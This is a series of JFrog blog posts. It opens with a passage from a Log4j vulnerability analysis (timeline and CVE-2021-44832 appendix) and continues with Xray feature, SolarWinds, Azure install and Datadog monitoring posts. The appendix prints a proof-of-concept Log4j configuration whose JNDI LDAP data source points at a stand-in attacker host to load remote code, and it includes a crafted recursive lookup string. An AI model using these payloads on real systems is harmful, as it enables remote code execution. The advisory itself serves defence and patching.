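        // Simulate a logger whose substitution logic throws on a crafted input.
        Consumer<String> brittleLogger = msg -> {
            if (msg.contains("${")) {
                throw new IllegalStateException("substitution loop");
            }
            System.out.println("LOG: " + msg);
        };

        logSafely(brittleLogger, "normal message");   // logged normally
        logSafely(brittleLogger, "${::-${::-${}}}");  // exception is contained
        System.out.println("application still running");
    }
}
```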

 

To summarize – this CVE currently does not seem to pose a real-world threat to production web applications.
As mentioned, JFrog’s real-world estimated CVSS is 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
We advise vendors to focus on upgrading any older Log4j2 deployments to 2.16.0, before tackling the task of upgrading 2.16.0 deployments to 2.17.0.

 

Appendix F –

Log4Shell timeline

18.07.2013 – The vulnerable JNDI lookup feature was committed.
24.11.2021 – Chen Zhaojun, an employee of Alibaba, reported the vulnerability to Apache.
26.11.2021 – CVE-2021-44228 was assigned by MITRE.
01.12.2021 – Earliest evidence of exploitation of the vulnerability (according to Cloudflare), which might suggest that the vulnerability details were leaked before public disclosure.
05.12.2021 – Apache’s developers created a bug ticket for resolving the issue; release version 2.15.0 is marked as the target fix version.
09.12.2021 – CVE-2021-44228 went public (the original Log4Shell CVE).
09.12.2021 – A security researcher dropped a zero-day remote code execution exploit on Twitter. The tweet was later deleted.
10.12.2021 – Version 2.15.0 was released (fixes CVE-2021-44228) with a fix that disables message lookups by default, and restricts JNDI operation to specific classes & hostnames.
10.12.2021 – Detected attacks on Minecraft servers.
13.12.2021 – Version 2.16.0 was released (fixes CVE-2021-45046) which completely removes message lookups (cannot be enabled in any configuration) and disables JNDI support by default (can be re-enabled).
14.12.2021 – CVE-2021-45046 went public, showing that Log4Shell can still be exploited on non-default configurations, but without a severe effect.
15.12.2021 – Version 2.12.2 was released (with similar fixes to 2.16.0) for backport support to Java 7.
16.12.2021 – The CVSS for CVE-2021-45046 was raised to 9.0, due to the discovery of several bypasses for the hostname and class mitigations in Log4j 2.15.0.
18.12.2021 – CVE-2021-45105 went public, showing a minor bug in Log4j’s string substitution that may cause an exception to be thrown in non-default configurations.
18.12.2021 – Version 2.17.0 was released (fixes CVE-2021-45105) which reimplemented string substitution and locked down JNDI to be used only locally.
22.12.2021 – Version 2.12.3 was released (with similar fixes to 2.17.0) for backport support to Java 7.
22.12.2021 – Version 2.3.1 was released (with similar fixes to 2.17.0) for backport support to Java 6.

 

Appendix G –

Impact analysis of CVE-2021-44832

An additional remote code execution CVE in Log4j2 2.17.0 was published – CVE-2021-44832, with CVSS 6.6 (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).

The CVE was fixed in versions 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).

The CVE has extremely high prerequisites (detailed below) and as such is unlikely to affect any real-world system.

At this point, we do not believe upgrading from Log4j2 2.17.0 (or equivalent versions) is critical.

CVE-2021-44832 Prerequisites

Currently, exploitation of the vulnerability is possible only if the attacker has direct control of Log4J’s configuration file, and specifically if the attacker can add a “JDBCAppender” with arbitrary attributes.

The vulnerability is caused by the “JDBCAppender” accepting a JNDI data source in its DataSource attribute.
When accessing a JNDI data source, remote protocols (such as LDAP) are still available, which means that specifying a string such as ldap://attacker.com:1337 will cause the vulnerable app to contact the attacker’s server, which can provide a remote class or serialized object to load.

PoC

This is an extremely minimal configuration file that will trigger the vulnerability:


<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN" name="Config1">
  <Appenders>
    <JDBC name="jdbcTest">
      <DataSource jndiName="ldap://attacker.com:1337/Exploit" />
    </JDBC>
  </Appenders>
</Configuration>

As mentioned, Log4j can be configured via many different formats (JSON, YAML, properties, etc.), therefore this is just one example of a working PoC.

Note that the vulnerable application does not actually have to log anything, but the logger does need to be initialized, for example like so –

Logger logger = LogManager.getLogger("HelloWorld");

CVE-2021-44832 Official Fix

The issue can be fixed by upgrading Log4j2 to version 2.17.1 (Java 8), 2.12.4 (Java 7) or 2.3.2 (Java 6).

The official fix disables the JNDI support for the JDBCAppender (by default) and adds a system property called log4j2.enableJndiJdbc that allows re-enabling it.

In addition, JDBC now reuses the common JNDIManager class, which means all previous restrictions on JNDI will apply, even when “enableJndiJdbc” is configured (ex. only the local java protocol is allowed in connection strings).

Mitigations of CVE-2021-44832

Similarly to the well-known Log4Shell mitigation, it is possible to remove the “JdbcAppender.class” file from the Log4J JAR file –

find ./ -type f -name "log4j-core-*.jar" -exec zip -q -d "{}" org/apache/logging/log4j/core/appender/db/jdbc/JdbcAppender.class \;



New Xray Features Enhance Workflows, Productivity and UX https://jfrog.com/blog/new-xray-features-enhance-worflows-productivity-and-ux/ Thu, 21 Oct 2021 14:34:28 +0000 https://jfrog.com/?p=83331

The recently released JFrog Xray versions 3.31 and 3.32 bring a raft of new capabilities designed to streamline your workflows, boost productivity and improve the user experience.

The new features, detailed below, solidify Xray as the universal software composition analysis (SCA) solution for JFrog Artifactory, trusted by developers and DevSecOps teams to identify and eliminate open source software vulnerabilities and license compliance violations from their software distributions.

Xray Reports Clone

This new feature, which requires Artifactory 7.23.x and above, lets you quickly and efficiently create a clone of an existing report in Xray Reports to reuse a report and its defined settings and configurations, saving you lots of time when recreating reports that you use often. 

Hot Upgrade 

With this new hot upgrade capability, you can upgrade any Xray High Availability (HA) installation easily and without having to turn off all the secondary nodes. By completing an Xray HA upgrade with zero downtime, you boost your team’s productivity. 

Set a Grace Period before Failing Build

If a CI server requests a build to be scanned, and a watch you’ve set up triggers a violation, Xray will indicate that the build job should fail.

Failing builds is a common practice to secure CI builds and prevent violations from entering your CI/CD pipeline. However, you may not always want to fail the build. For example, some violations are not showstoppers, and you can look into them later without stopping the build creation. 

In these cases, you can set a grace period for a number of days according to your needs. During the grace period, the build will not fail and all violations will be ignored. An automatic Ignore Rule is created for the grace period with the following criteria:

  • On the specific vulnerability/license
  • On the specific component
  • On any version of the specific build
  • On the specific policy
  • On the specific watch

Once the grace period ends, the ignore rule is deleted, and if the build contains violations, it will fail. This capability is only available if the watch is defined with build as target type.

For more detailed information, see Creating Xray Policies and Rules.

Grace Period REST API Support

A new parameter has been added to support the Grace Period feature in the Create Policy REST API. 
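As a sketch, the grace period is set inside a policy rule’s actions block. The parameter name below (build_failure_grace_period_in_days) reflects the Xray REST API documentation at the time of writing – confirm it, and the surrounding field names, against your Xray version:

```json
{
  "name": "sec-policy-with-grace",
  "type": "security",
  "rules": [
    {
      "name": "fail-critical",
      "priority": 1,
      "criteria": { "min_severity": "Critical" },
      "actions": {
        "fail_build": true,
        "build_failure_grace_period_in_days": 5
      }
    }
  ]
}
```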

Enhanced Xray Dependency Scanning and On-Demand Binary Scanning

Shifting left means catching and fixing vulnerabilities and license violations as early as possible in your SDLC, including before developers check in code. Performing on-demand scanning of either your source code dependencies or binaries before committing to Artifactory is the ultimate shift-left tactic. Here are some reasons why you might need this capability:

  • Not all of your binaries or builds are stored in Artifactory
  • You discover vulnerabilities/licensing violations before uploading to Artifactory
  • A security person may need to scan a binary sent to them for verification
  • Organizations may want to only deploy approved binaries into Artifactory

The recently introduced Xray Dependencies and Xray On-Demand Binary scanning capabilities now include the option to ignore violations. In the JSON report of each scan, an Ignore Rule URL is included in the results, enabling you to create ignore rules for violations in the report, as described in Ignore Rules.

New Filter in Watches

Starting from Xray version 3.31.x and above, you can filter the Watches list in the Watches page in Xray to narrow down and display only Watches that are relevant to you. When you select the Filter button in the top-right corner, the filter dropdown list appears, with an array of different options. Configure the filtering options to display the Watches or Watch data you want to see. 

For more information, see Configuring Xray Watches.

Filter Ignore Rules

Now you can use an array of different filtering options to narrow down the list of Ignore Rules using different criteria. That way, you’ll only see Ignore Rules that are relevant to you. After selecting the Filter button in the top-right corner, the filter dropdown appears and you can configure the options to display the Ignore Rules or Ignore Rules data you want to see.

[Note: The new features mentioned above require Artifactory version 7.25.x and higher.]

For more information, see Ignore Rules.

Ignore Rules REST API Enhancement 

If you and your team are working together using JFrog Projects and the REST API, we have a great new feature that will allow you to sort the Get Ignore Rules REST API by project. This can streamline your workflows while working with REST APIs and Ignore Rules in JFrog Projects.

These exciting new features are available now for Xray users. Don’t have a JFrog account yet? You can easily get free access to Artifactory and Xray in two ways: A 30-day free trial with our Self Hosted option, or a permanent free subscription with our Cloud option, which also includes JFrog Pipelines, our CI/CD orchestration solution.

SDLC Security: It’s Personal for JFrog https://jfrog.com/blog/sdlc-security-its-personal-for-jfrog/ Wed, 23 Dec 2020 16:29:06 +0000 https://jfrog.com/?p=68026

The SolarWinds hack, which has affected high-profile Fortune 500 companies and large U.S. federal government agencies, has put the spotlight on software development security — a critical issue for the DevOps community and for JFrog. At a fundamental level, if the code released via CI/CD pipelines is unsafe, all other DevOps benefits are for naught.

What happened

SolarWinds, an IT monitoring and management vendor, said hackers breached its systems and inserted malware into the software build process of its Orion Platform. For several months, product updates shipped with the vulnerability, which was designed to help hackers compromise customers’ Orion servers using a backdoor. 

It’s estimated that about 18,000 customers received the contaminated updates, and that several dozen got breached. Those affected include Microsoft, the U.S. Department of Homeland Security (DHS), and FireEye, a cyber security vendor which first detected the attack this month after the hackers stole proprietary security tools it offers to its clients.

SDLC Security Under the Microscope

SolarWinds, which builds all products utilizing a secure development lifecycle, including architectural reviews, static and dynamic code analysis, and open-source analysis, has already tightened its SDLC security, including by:

  • Further restricting access rights to its build environment
  • Using a new code-signing certificate for new builds
  • Reviewing the build environment’s architecture, the privileged and non-privileged users with access to it, and the network surrounding it

It’s also been reported that the company may have inadvertently exposed FTP credentials in a public Github repository last year, raising the question of whether this may have been an avenue for the hackers to breach its systems.




A Troubling Trend

This type of breach, known as an upstream supply chain attack, has become increasingly popular among hackers, because it offers an extremely effective vector. By poisoning code that’s assumed to be safe, cyber criminals exploit the trusted relationship between software providers and their customers. Hackers’ malware hides in legitimate software and gets unknowingly shipped to thousands of customers through otherwise official distribution methods.

How JFrog Can Help

JFrog has been creating awareness about DevSecOps and building security capabilities into its platform for years. It’s our belief that security must be baked end-to-end into the SDLC — from design to production. 

That way, security gaps — vulnerabilities, malware, misconfigurations, policy violations and more — can be caught early and often, and fixed immediately, before bad actors get a chance to exploit them.

It’s a broad, complex undertaking that requires a holistic, multi-dimensional approach, and that encompasses application security, infrastructure security, data security and comprehensive role-based access control (RBAC). 

Here’s a brief rundown of what we offer for DevSecOps within the JFrog Platform, as well as some recommendations.

JFrog Xray

JFrog Xray is our DevSecOps tool, designed to offer continuous security and universal artifact analysis. Through a multilayer analysis of containers and software artifacts, this software composition analysis (SCA) tool scans for vulnerabilities, detects license compliance issues, and helps you take appropriate action quickly.

JFrog Xray is natively integrated with JFrog Artifactory, our platform’s flagship component, providing optimized scanning, unified operation, and a single pane of glass view into your artifacts’ security and compliance issues. Identification of vulnerabilities and traceability of your builds are inseparable. You must weave security and license compliance tightly into your artifact management system. That way, when a vulnerability is detected, you know how it got there and how it impacts everything else. 

In addition, Artifactory provides granular RBAC capabilities, so you can limit access to artifacts, and determine what kind of access to grant, such as read-write, or read-only permissions. Furthermore, Artifactory’s rich metadata gives you full traceability of artifacts. That way, you can respond instantly to breaches, and generate a new, safe build with uncompromised components — in hours, not days.

JFrog Xray’s deep recursive scanning gives you visibility into all the underlying layers and dependencies of components, and provides complete impact analysis, so you can understand which artifacts contain insecure components. And it does all this continuously and at the speed of DevOps, so you can identify and fix violations early and often in the SDLC — even directly from within your IDE — without creating security-check bottlenecks at the end of the cycle.

Attempting to do all this manually, and with disparate point tools that don’t interoperate well, slows you down, and prevents you from pinpointing security issues with precision and at scale — putting you at risk for breaches.

JFrog Pipelines

As we’ve explained before, keeping secrets safe can be challenging for CI/CD tools. They must connect to many other services, each with its own password or token — data that must be shielded from cyber crooks.

JFrog Pipelines was designed for secrecy from the start, with native, built-in secrets management. Through its integrations capabilities, Pipelines combines central secrets management with granular access permissions of the JFrog Platform. Its out-of-the-box integrations include GitHub, Bitbucket, Docker, Kubernetes, and Slack, as well as public cloud platforms, such as AWS, GCP, and Azure.

With Pipelines integrations, you can share secure resources, while safeguarding the secrets that authorize their use. Using the JFrog Platform’s unified permissions model, you can grant access to those who need it and block access to everyone else. This all automates and streamlines the process of protecting secrets from being inadvertently exposed or actively stolen from your CI/CD tools.

Best Practices

Rolling out a comprehensive, holistic DevSecOps strategy is a must, especially with the exponential growth of open source software, which we know often contains vulnerabilities and other security faults. As we outlined in this white paper, these recommendations provide a solid baseline for starting or fine-tuning your DevSecOps practices:

  • Establish DevSecOps as a cornerstone of your SDLC
  • Instill security knowledge and ownership across your developer and operations teams
  • Utilize security and compliance best practices and adopt continuous improvement tactics
  • Use an integrated suite of DevSecOps tools that can automate security and governance
  • Ensure your toolsuite includes a universal software composition analysis solution
  • Utilize the most comprehensive and timely vulnerability intelligence database
  • For companies receiving software updates from trusted vendors: Practice due diligence and have a proper security-focused policy for accepting code contributions from any source. While it is time intensive, every code change should go through at least two sets of eyes. That way if credentials are abused to inject new code into a project, a second person would be responsible for checking that code.
  • For DevOps teams to prevent having their pipeline breached and their code tampered with by hackers: DevOps teams should periodically review third-party code used in their software. Do they still need it? Is the project actively maintained? Is there a history of vulnerabilities in the code? Does that project have a policy that includes reviewing contributions from outside parties? These are all important questions to ask.

Take a free JFrog Trial and experience first-hand how Xray’s deep binary scanning and impact analysis capabilities boost security and compliance across your DevOps pipeline.

A Few Minutes More: Add Xray DevSecOps to Artifactory Enterprise on Azure https://jfrog.com/blog/add-xray-secops-to-artifactory-enterprise-on-azure/ Thu, 15 Oct 2020 18:00:48 +0000 https://jfrog.com/?p=65316

Editor’s Note (2024): Please refer to the current JFrog Software Supply Chain Platform listing on Azure Marketplace to get started with JFrog on Microsoft Azure.

 

In a prior blog post, we explained how to install or update Artifactory through the Azure Marketplace in the amount of time it takes for your coffee order to arrive on the counter.

Now you can also add Xray, the cream of software composition analysis (SCA) tools, to your self-managed (BYOL) Artifactory deployment through the Azure Marketplace.

JFrog Xray is a universal SCA solution that natively integrates with Artifactory, giving developers and DevSecOps teams an easy way to proactively identify open source vulnerabilities and license compliance violations, before releasing at-risk applications into production. 

Why Add Xray SCA

Xray supports all major package types and integrations, knowing how to unpack each one and what every underlying layer contains. Xray’s deep recursive scanning sees into all the underlying layers & dependencies of components, even those packaged in Docker images and ZIP files.

JFrog Xray Integrations

Each unpacked component is examined to uncover potential vulnerabilities and license compliance violations.

From this data, Xray can present a component graph analysis of every artifact and dependency structure, providing you unique visibility to determine the impact of all discovered risks.

What You Need

You will need a few things before you get started:

Installing an Azure PostgreSQL Server

Xray uses a database to index component vulnerability data. Like Artifactory, you can configure Xray with a database source of your choice.

Our recommended best practice configuration for Xray is to use a database server on a node that is separate from the node where Artifactory and Xray run.

 

To accomplish this, you will need to create an Azure PostgreSQL service before installing Xray. You can then install Xray to use this existing database.

We’ve created a helpful ARM template for you that will deploy an Azure PostgreSQL service with the ideal settings for use with Xray. You can find this template in our JFrog-Cloud-Installers repo, or you can pick one from the official Azure repository.

You can clone the JFrog repo to your own workstation:

$ git clone https://github.com/jfrog/JFrog-Cloud-Installers.git
$ cd ~/JFrog-Cloud-Installers/AzureResourceManager/Postgresql

Edit the postgres.parameters.json file and set the values of db_user, db_password, and db_server.

The file azurePostgresDBDeploy.json is the ARM template, which contains the preferred settings. The skuSizeMB parameter sets the database storage to 200 GB, which is the recommended size for Xray.

Using the Azure CLI, deploy the PostgreSQL service to the same resource group used for Artifactory deployment. 

$ az deployment group create --resource-group <resource-group-name> --template-file azurePostgresDBDeploy.json --parameters @postgres.parameters.json

After deployment is done, you will see the PostgreSQL service in your resource group.

This server is now available to use with Xray.

BYOL Install on Azure Cloud

Once you’re prepared with these essentials, you can start the install from Azure Marketplace.

  1. Go to Microsoft Azure Marketplace.
  2. Search for “JFrog” or “Xray”
  3. Select JFrog Xray ARM Template

JFrog Xray ARM Template

Or you can navigate directly to JFrog Xray ARM Template.

To start the install procedure: 

  1. Click on the GET IT NOW button.
    If you are not signed in, Marketplace will ask you for your Azure account credentials.
  2. In the resulting popup, click Continue to agree to Microsoft terms.
  3. Click Create

The procedure will now take you through a series of tabs to enter information.

Basics

Here you will select the active subscription for this instance, as well as its region, which must be the same as the Artifactory deployment.

You must also select an Azure Resource Group for the instance. You may not select the same resource group where Artifactory was deployed. With that exception, you can either choose one that has already been created through the Azure Resource Manager, or click Create new to define one now.

VM Credential

In this tab you must specify a set of login credentials for the VM that will be created for JFrog Xray to run in. Enter a valid username for the VM administrator, and define either a password of at least 12 characters or an SSH public key.

The Xray instance should be in the same virtual network as the Artifactory instance. Select the virtual network from the resource group where you‘ve deployed Artifactory, and select any available subnet in that VN. The recommended VM size is Standard D4s v3, and the minimum requirement is 4 vCPUs. 

Xray Settings

Select the Xray version, set the cluster name and generate the master key. 

Your Artifactory join key can be found in the Administration module of Artifactory. In the Security > Settings tab, enter your password in Connection details to unlock the platform connection details. You can then view and copy the join key to paste into the ARM template form. Provide the URL to your Artifactory deployment.

Database Configuration

On this screen you can create or connect Xray to a database. If, as recommended, you have created a PostgreSQL service on another node, select Use existing postgresql instance. Then enter the database server name and the connection string, as well as the username and password for your PostgreSQL instance.

Connection string example:

postgres://<db_server_name>.postgres.database.azure.com:5432/<db_name>?sslmode=disable


Review + Create

In this final tab, Azure will verify your configuration. Once validation passes, click Create to start the deployment.

After Deployment

The hard work is done! The ARM template takes over from here, deploying Xray and its component parts into the Azure VM, and joining it with Artifactory.

When the deployment is complete, log in to your Artifactory instance. You will see the Index Resources popup, which confirms Xray is up and running. From here, you can select which repositories you want Xray to index.

Once you set up your Xray watches, you can enjoy the rich taste of DevSecOps, secure that you’ll be alerted when a critical component has an issue, and that unsafe builds can be blocked from release.

For a full demo of the Artifactory, PostgreSQL, and Xray installation process, watch this tutorial video.

Track JFrog Platform Performance with Datadog Analytics https://jfrog.com/blog/track-jfrog-platform-performance-with-datadog-analytics/ Mon, 20 Jul 2020 14:44:07 +0000 https://jfrog.com/?p=60980

Faithful operation of your JFrog Platform can be best assured by tracking usage data of Artifactory and Xray. With insights gained through real-time observability and log analytics, you can boost the efficiency of your DevOps pipeline and keep your software releases running joyfully.

Datadog is a SaaS-based monitoring and analytics platform that is popular for cloud-scale applications, and it can be readily enabled for JFrog Platform monitoring through our integrations.

Let’s take a look at the two-step process to install the data collector integration and use Datadog to monitor the operation of your JFrog Platform.

Using Fluentd

To start, we’ve made available a JFrog log analytics integration with the open-source data collector Fluentd that can be installed with each product instance of the JFrog Platform Deployment. Fluentd performs the log input, field extraction, and record transformation for each product in the JFrog Platform, normalizing the output of this data to JSON.

With all log data available in this common format, Fluentd will deliver it through Fluentd’s pluggable architecture to your Datadog dashboard.

Installing FluentD

You must install a Fluentd logging agent in each node of your JFrog Platform Deployment (JPD). This agent will tail the various JPD log files for new entries, apply any corresponding record transformations and then send to the relevant output plugin for Fluentd.

To install the Fluentd agent in each node, perform the procedure for the node’s OS type as shown in the Fluentd installation guide.

For example, for nodes operating Red Hat UBI Linux, the Fluentd agent td-agent must be installed. For root-based package managers (root access is required):

$ curl -L https://toolbelt.treasuredata.com/sh/install-redhat-td-agent3.sh | sh


Or, for user-space installations on Red Hat UBI, install the Fluentd Ruby and Gem:

$ curl -O  | tar -xvf

Configuring FluentD

Depending on whether you completed a root-based or non-root-based installation, the Fluentd configuration file may need to be placed in a different location.

By default, for package manager (root) installations, the td-agent.conf file is located in /etc/td-agent/:

$ ls -al /etc/td-agent/td-agent.conf 
-rw-r--r-- 1 root root 8017 May 11 18:09 /etc/td-agent/td-agent.conf


For non-root-based installations, we can store the td-agent.conf file anywhere we have write permissions. When we run td-agent, we can use the -c flag to point Fluentd to this file location.

The configuration file must be replaced with a configuration file derived from the JFrog log analytics Github repo.

In this repo, the datadog folder contains configuration file templates. Use the template that matches the JFrog application running in the node.

  • Artifactory 7.x
  • Xray 3.x
  • Artifactory 6.x

We will need to update this configuration file with a match directive that routes the log output to our Datadog account, authenticated with our Datadog API key.

#DATADOG OUTPUT
<match **>
  @type datadog
  @id datadog_agent_artifactory
  api_key <YOUR_API_KEY>
  # optional
  include_tag_key true
  dd_source fluentd
</match>
#END DATADOG OUTPUT

Running Fluentd

Now that we have the new configuration file in place we can start td-agent as a service on the pod after logging into the container:

$ systemctl start td-agent


For non-root installs, we can run the td-agent against the configuration file directly:

$ td-agent -c td-agent.conf

 

This will start the Fluentd logging agent, which will tail the JPD logs and forward them to Datadog.

You must repeat these procedures for all Kubernetes pods running Artifactory and Xray.

Using Datadog

Datadog can be set up by creating an account and going through the onboarding steps, or by using an existing apiKey. For a new Datadog setup, do the following:

  • Run the Datadog agent in your Kubernetes cluster by deploying it with the Helm chart
  • To enable log collection, update the datadog-values.yaml given in the onboarding steps
  • Once the agent starts reporting, you’ll get an apiKey, which we’ll use to send formatted logs through Fluentd
  • Install the Fluentd integration: go to Integrations, search for Fluentd, and install it

Once Datadog is set up, we can access logs through Logs > Search and select the specific source we want logs from.

If an apiKey already exists, use the Datadog Fluentd plugin to forward logs from Fluentd directly to your Datadog account. Follow the Fluentd plugin configuration instructions for Artifactory to set up the integration. Adding proper metadata is the key to unlocking the full potential of your logs in Datadog; by default, Datadog remaps the hostname and timestamp fields, so we don’t need to specify them.
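The remapping works because Datadog recognizes certain reserved attributes on each JSON log record. A minimal illustration of such a record (the attribute names ddsource, service, and hostname follow Datadog's reserved-attribute conventions; all values here are hypothetical):

```python
import json

# A formatted log record as the Fluentd output might emit it to Datadog.
# All values are hypothetical examples.
record = {
    "message": "Artifact deployed: example-repo-local/app-1.0.jar",
    "ddsource": "fluentd",             # corresponds to dd_source in the output plugin
    "service": "artifactory",          # hypothetical service name
    "hostname": "artifactory-node-0",  # remapped by Datadog to the host field
}
payload = json.dumps(record)
print(payload)
```

Because Datadog derives the host and timestamp from these reserved attributes automatically, the Fluentd configuration only needs to set the source and any custom fields.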

Add all attributes as facets from Facets > Add on the left side of the screen in Logs > Search.

Now create a new dashboard from Dashboards > New Dashboard > New Screenboard.

Import the dashboard from export.json and replace the newly created dashboard with it. You can now access the dashboard, whose data widgets give real-time observability into the JFrog Platform.

Once installed, the JFrog Platform Logs dashboard presents timeline and count data for key operating metrics:

  • Log volumes, which can be filtered by type
  • Service errors
  • HTTP response codes
  • Accessed images
  • Accessed repositories
  • Data transfers in GB for uploads/downloads
  • Top 10 IPs for upload/download
  • Audit actions by username
  • Denied actions and logins by IP and username
  • Accepted deploys by username

A Fetching Solution

Now you have a robust monitoring solution using Datadog and are empowered to observe your JFrog Platform Deployment across all of its services and nodes, gaining valuable insights into its operation.
